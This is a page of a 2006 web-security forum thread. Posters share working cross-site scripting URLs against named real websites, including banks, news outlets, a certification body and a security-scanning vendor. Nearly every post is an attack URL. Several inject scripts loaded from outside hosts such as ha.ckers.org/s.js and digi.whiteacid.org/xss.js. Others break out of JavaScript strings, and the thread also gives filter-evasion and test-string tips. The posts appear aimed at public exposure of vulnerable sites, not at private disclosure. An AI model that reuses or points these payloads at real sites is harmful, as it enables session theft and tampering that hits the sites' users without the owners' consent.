Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...23456789101112...LastNext
Current Page: 7 of 65
Re: So it begins
Posted by: tsar
Date: September 25, 2006 10:39PM

[www.pepperjam.com]

This site has also had SQL injection vulns which revealed their AES encryption key. Seems they fixed that, but not the XSS.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 25, 2006 10:48PM

http://national.citysearch.com/search?x=0&y=0&search_select=on&init_search=1&context=directory&miles=99&pre_geo_id2=&request_market_only=&query=%3cscript%20src%3Dhttp://ha.ckers.org/s.js%3e%3c/script%3e&cslink=cs_topbar_search&pre_csz=&pre_geo_id1=&store_where_for_comparison=USA&started=1&hotelAttraction=

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 10:51PM

Anyone need a home loan? https://www.wamuhomeloans.com/cgi-bin/mqinterconnect.cgi?link=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 25, 2006 10:56PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.anywho.com/qry/wp_fap&lastname=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Submit=Submit << Anywho.com

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 10:57PM

This one is interesting because it really is a DOM based XSS (not reflected). Scanners would have a tough time with this one. http://www.hbo.com/scripts/video/vidplayer_set.html?movie=/av/events/psa/ncta_psa+section=events+num=1115404066482+title=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%20PSA:%20%22From%20A%20Distance%22:%20Visit%20www.controlyourtv.org+tunein=

Here's the offending JavaScript:

function queryString(key){
var page = new PageQuery(window.location.search);
return unescape(page.getValue(key));
}

movie = queryString('movie');
section = queryString('section');
title = queryString('title');
num = queryString('num');
tunein = queryString('tunein');

And then way further down:

document.write( "<span class=\"title\">" + title + "</span><br>" );

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 11:01PM

http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=default_collection&sort=date%3AD%3AR%3Ad1&q=%22%3Balert%28%22XSS%22%29%3B%2F%2F

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 25, 2006 11:11PM

h**p://www.beliefnet.com/search/search_site_results.asp?search_for="><script src=http://ha.ckers.org/s.js></script>&to_search=whole_site

^^ not being displayed correctly due to the http regex!


on a side note i would insterested to learn of attack vectors being used.

personally iam testing with <>";=)moocow64 and then viewing/searching the source for moocow and then determing what characters are being echo'd.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 09/25/2006 11:20PM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 11:21PM

I can't read swedish but I think this is a big site: http://www.hemnet.se/bevakning/BevLogin.asp?service=hemnet&type=bev&action=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&username=&email=&reklam=N&htmlmail=N&error=-2&

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 25, 2006 11:24PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.verisign.com/cgi-bin/ssl/email-friend/email.cgi&chromeTitle=End%20of%20the%20Internet&check=yes&url=http://www.shibumi.org/eoti.htm&to_email=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3C%2F%73%63%72%69%70%74%3E - VeriSign via POST


digi7al64, I personally use a modification of the short XSS location - http://ha.ckers.org/xss.html#XSSlocator2

'';!--"/><XSS>=&{()}

Then I search source for XSS and see how it handled it.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 11:32PM

(Ericsson.se) it's attack of the Svedes: http://ha.ckers.org/expect.swf?http://www.ericsson.se

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 25, 2006 11:40PM

I think I'm going to make a list of the sites we XSS here. Just for a record.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 26, 2006 01:18AM

wow.. i was gone for a day, and you guys managed to fill up more than a page of posts in this thread.. not to mention being /.'ed ^^

well good job on all of it, i'm glad to see this forum getting more recognition, which'll hopefully bring in more web app sec experts (and web app sploit experts) ..

digital64: the http regex is easily fixed by changing all the " to %22 (and space to %20).. i.e.:
h**p://www.beliefnet.com/search/search_site_results.asp?search_for=%22><script src=http://ha.ckers.org/s.js></script>&to_search=whole_site -> http://www.beliefnet.com/search/search_site_results.asp?search_for=%22><script%20src=http://ha.ckers.org/s.js></script>&to_search=whole_site

and as for the test injection i use: asdf'a"s>d<f>g;!-e=+r)(t%y\u/i i
why all the letters in between? because when the website \escapes alot of the special characters.. its harder for me to tell which ones when mashed together like ';!--"/>\< .. and i look for the 'asdf' ... but whenever i just randomly throw it into a website im visiting, its usually asdf'e"r>t<y> .. because it's fast to type.

kyran: i thought i should do the same for quicker reference, to throw into a sql database including the fields: TLD, vector, vector type, site category, and filter type .. but then i remembered i'm lazy with too many half done projects =__=

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 26, 2006 01:42AM

haha maluc, for now I'm just making a LIST of the sites. Once it's done I'll think of making an xml document with it all, including attack vectors etc.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 26, 2006 01:53AM

Maluc! You've been quoted! I was quoted too but it wasn't long enough to warrant a name. :P

http://weblog.infoworld.com/techwatch/archives/008062.html

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 26, 2006 01:53AM

and since we've been giving other sites the same treatment for mentioning sla.ckers:
http://www.ddj.com/TechSearch/not_found.jhtml;jsessionid=1BKYW43EIVWIKQSNDLRCKH0CJUNN2JVN?nftype=error&queryText=%22;alert(%22XSS%22);%22&site_id=3600005&_requestid=190824

i'll save myself the effort of checking slashdot though.. won't be as easy to find one.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 26, 2006 02:17AM

Slashdot would be a mission and a half.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 26, 2006 02:20AM

also: http://www.ddj.com/TechSearch/not_found.jhtml;jsessionid=1BKYW43EIVWIKQSNDLRCKH0CJUNN2JVN?nftype=error&queryText=--%3E%3Cscript%3Eeval('if(document.getElementById(%22COPYRIGHTContainer%22).innerHTML!%3D%22%22)%7Bdocument.getElementById(%22COPYRIGHTContainer%22).innerHTML%3D%22%22;alert(%22XSS%22);%7D');%3C/script%3E%3Cb%22&site_id=3600005&_requestid=192557

it is quite spammy with its injection, so i added the check to only run once..

btw digital64: you also have to hex-encode brackets for link posting here, { -> %7B , } -> %7D ..

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 26, 2006 02:57AM

for maluc...

http://subscribe.infoworld.com/cgi-win/ifwd.cgi?e=%22%3E%3Cscript%20src=http://digi.whiteacid.org/xss.js%3E%3C/script%3E&x=0&y=0&m=newsletter

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 09/26/2006 04:37AM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 26, 2006 10:28AM

More links about this part of the forum, gentlemen:
http://www.techworld.com/security/news/index.cfm?newsID=6966&pagtype=all

and: http://www.pcadvisor.co.uk/news/index.cfm?newsid=7175

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 26, 2006 10:48AM

Wow. 9 Articles about this specific thread so far.
Now if only we could get on news.com.com

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 26, 2006 10:53AM

By get on there do you mean find an XSS, or... ? ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 26, 2006 10:55AM

Ahaha. Either way. Although I'm not sure how happy they would be if we found one before they post about us. ;)

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 26, 2006 11:24AM

I couldn't help myself.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://news.com.com/2113-1038_3-6119515.html&toEmailAddress=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E <-- news.com.com

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 26, 2006 11:54AM

lol, i didn't even notice that you said i was quoted, kyran.. how nice. ^^
i guess my rants are good for something..

anyway, thanks for the dedication digital ^^ .. and i'll go ahead and continue with the new site auditing:

http://www.techworld.com/search/index.cfm?fuseaction=dosearch&thecriteria=asdf%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Cb+%22&Search=SEARCH&search_networking=1&search_storage=1&search_security=1&search_mobility=1&search_applications=1&search_opsys=1&search_midsizedbusiness=1&search_news=1&search_reviews=1&search_blogs=1&search_whitepapers=1&search_insight=1&search_casestudies=1&search_howto=1&search_briefings=1&search_interviews=1 html tag breakout
http://www.techworld.com/search/index.cfm?fuseaction=dosearch&channel_search=channel&search_reviews=1&search_news=1&search_insight=1&search_howto=1&search_whitepapers=1&search_casestudies=1&search_briefings=1&search_interviews=1&search_blogs=1&search_networking=1&search_storage=1&search_security=1&search_mobility=1&search_applications=1&search_opsys=1&search_midsizedbusiness=1&thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Go=Go javascript function call breakout
http://www.techworld.com/account/login/index.cfm?fuseaction=login&currentloc=%2Fabout%2Fcommercial.cfm&currentlocparms=&userid=XSS+is+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&password=apple&login=login no breakout needed
http://www.pcadvisor.co.uk/search/index.cfm?thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Search=GO&action=dosearch&search_news=1&search_reviews=1&search_features=1&search_blogs=1&search_downloads=1&searchorigin=header same javascript function call breakout (they're owned by the same company, IDG)

off to make some breakfast.. with a nice bit of ego boost :3

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 26, 2006 12:04PM

kyran, although i think you said you use opera .. (in which i recommend opera8.54, because its the only view source that shows the changes, if the site/page.pl name doesn't change)

..but the WebDeveloper extension for firefox has an extremely useful feature for converting all POSTs to GETs .. as most POSTs still work, when submitted as GET

to expand on your find: http://news.com.com/2114-1038-6119515.html?toEmailAddress=%22%3EXSS+is+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cbr+%22&fromEmailAddress=%22%3EXSS+here+too%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cbr+%22&comments=and+here%3F%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&CAPTCHA_RESPONSE=&CAPTCHA_GUID=8a8f128e0dcbac55010deb0f55616c91

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 26, 2006 12:17PM

http://www.digitmag.co.uk/search/index.cfm?fuseaction=dosearch&thecriteria=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Search=Go&search_news=1&search_blogs=1&search_reviews=1&search_features=1 no breakout, only double quotes " are filtered
http://www.digitmag.co.uk/search/index.cfm?fuseaction=dosearch&thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Search=Go&search_news=1&search_blogs=1&search_reviews=1&search_features=1 again, same javascript function call breakout

digit is owned by the same company as MacWorld, TechWorld, and PCAdvisor .. so they all have similar holes but each its own unique one too _-_

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 26, 2006 04:09PM

With all the media attention on XSS now, one would think that people would act on this information. But we still find XSS vulnerabilities in major sites, even ones that report on XSS being an issue! The problem is that most web developers have no security training at all.

It seems "Email to a friend"-style pages are almost always vulnerable to it.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 26, 2006 04:51PM

are you hacker safe?

https://www.scanalert.com/SignUp.sa?adds106=2&act=step3&company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22

try to key in your company name ...

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 26, 2006 05:58PM

kirke: that works in IE and opera .. but not firefox, because the ending " in the link is unnecessary (the site adds one in too)

good work though, and it's sad to see who passes themselves off as web application security consultants and experts these days =.= .. their associates degree in web design and https://www.isc2.org/cgi-bin/login.cgi?Command=TempPassword&CertificateNumber=%3Cscript%3Ealert%28%22Yes%2C+this+is+the+International+Information+System+Security+Certification+Consortium.+And+Yes%2C+they+should+probably+uncertify+themselves..%22%29%3C%2Fscript%3E&LastName=&HomeCity=&x=9&y=8 membership is hardly worth the paper the check was written on to buy them. I'm not really sure what they spend their time doing during their 'audits' .. but this is stuff i could likely teach a ten year old to find, after two hours of explaining.

This is in no offense to the legitimately well-informed webappsec professionals out there, but you're about as rare as an xss-free site - and we all know how rare that is..

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 26, 2006 09:21PM

some more scanalert ones: https://www.scanalert.com/Content.sa?sec=2&sub=4&send=Y&ref=&rid=&region=EN&name=XSS0%22+onmouseover%3D%22alert%28%27XSS0%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&company=XSS1%22+onmouseover%3D%22alert%28%27XSS1%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&url=XSS2%22+onmouseover%3D%22alert%28%27XSS2%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&phone=XSS3%22+onmouseover%3D%22alert%28%27XSS3%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&ext=XSS4%22+onmouseover%3D%22alert%28%27XSS4%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&email=XSS5%22+onmouseover%3D%22alert%28%27XSS5%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22 automagic in FF, mouseover any field in other browsers

and i love seeing the 11,400 views for this thread _-_

-maluc

Options: ReplyQuote
Pages: PreviousFirst...23456789101112...LastNext
Current Page: 7 of 65


Sorry, only registered users may post in this forum.